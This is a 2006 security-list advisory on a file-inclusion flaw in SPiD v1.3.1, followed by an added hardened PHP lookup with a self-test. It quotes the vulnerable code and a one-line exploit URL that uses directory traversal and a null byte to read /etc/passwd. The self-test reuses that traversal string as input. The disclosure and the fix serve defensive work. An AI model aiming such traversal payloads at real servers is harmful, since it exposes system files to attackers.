Open Source and information security mailing list archives
Date: Sat, 25 Feb 2006 15:44:57 +0300
From: NSA Group <vulnerability@...g.ru>
To: bugtraq@...urityfocus.com
Subject: NSA Group Security Advisory NSAG-№201-25.02.2006 Vulnerability SPiD v1.3.1

Advisory: NSAG-№201-25.02.2006
Research: NSA Group [Russian company on Audit of safety & Network security]
Site of Research: http://www.nsag.ru or http://www.nsag.org
Product: SPiD v1.3.1
Site of manufacturer: http://spid.adnx.net/

The status:
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.

Original Advisory: http://www.nsag.ru/vuln/955.html

Risk: Hide

Description: An attacker can craft a query in the URL and get access to system files.

Vulnerability code:
+++++++
if (isset($_REQUEST["lang"])) {
    // The request parameter is concatenated into the path without validation
    $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php";
    if (file_exists($file_lang)) {
        include $lang_path . "lang.php";
        include $file_lang;
..... skip
+++++++

Exploit:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00

More information: http://www.nsag.ru/vuln/955.html

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.nsag.ru «Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
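A hardened form of the language-file lookup quoted in the advisory, as an added example that is not SPiD code and not part of the original message. The function name resolve_lang_file(), the language-code pattern and the temporary demo directory are assumptions; $lang_path and the lang_<code>.php naming come from the advisory's snippet.

```php
<?php
// Added example, not SPiD code. resolve_lang_file() and the language-code
// pattern are assumptions; $lang_path and the lang_<code>.php naming come
// from the advisory's snippet.

/**
 * Return the absolute path of the language file for $lang, or null if the
 * value is not a plain language code or resolves outside $lang_path.
 */
function resolve_lang_file(string $lang_path, $lang): ?string
{
    // Reject arrays (?lang[]=x) and anything that is not a short code such
    // as "en" or "pt_BR". This excludes "/", "\", "." and NUL bytes.
    if (!is_string($lang) || preg_match('/\A[A-Za-z]{2,3}(_[A-Za-z]{2})?\z/', $lang) !== 1) {
        return null;
    }

    $base = realpath($lang_path);
    if ($base === false) {
        return null;
    }

    // Defence in depth: canonicalise and confirm the file is inside $base.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . 'lang_' . $lang . '.php');
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed self-check: build a temporary language directory and probe it.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'lang_en.php', "<?php\n");

$inputs = ['en', 'xx', '../../../../etc/passwd' . "\0", ['en']];
foreach ($inputs as $input) {
    $path = resolve_lang_file($dir . DIRECTORY_SEPARATOR, $input);
    echo json_encode($input), ' => ', $path === null ? 'rejected' : 'include ' . $path, "\n";
}
unlink($dir . DIRECTORY_SEPARATOR . 'lang_en.php');
rmdir($dir);
```

Only the first input resolves to a file; the caller includes the returned path and falls back to a default language when the function returns null.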